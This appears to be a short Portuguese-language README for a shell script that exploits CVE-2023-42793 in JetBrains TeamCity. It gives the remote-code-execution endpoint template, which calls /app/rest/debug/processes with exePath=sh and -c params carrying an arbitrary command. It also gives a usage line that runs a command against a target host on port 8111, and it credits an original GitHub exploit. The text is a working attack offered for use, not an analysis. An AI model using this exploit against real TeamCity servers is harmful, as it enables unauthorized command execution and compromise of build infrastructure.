
teamcity-exploit-cve-2023-42793
Um script rápido para explorar a falha cve-2023-42793. Leitura adicional sobre a exploração pode ser encontrada aqui:
https://www.cnblogs.com/LittleHann/p/17843271.html
Este script adiciona a capacidade de usar "params" livremente para executar comandos após acionar a falha RCE:
RCE_ENDPOINT="${BASE_URL}:${PORT}/app/rest/debug/processes?exePath=sh¶ms=-c¶ms=${URLCMD}"
Uso: <base_url> <porta> <comando>
./TeamCity.sh blah.com 8111 "ls -lah"
O script original está aqui, todo crédito deve ser dado a eles: https://github.com/Zenmovie/CVE-2023-42793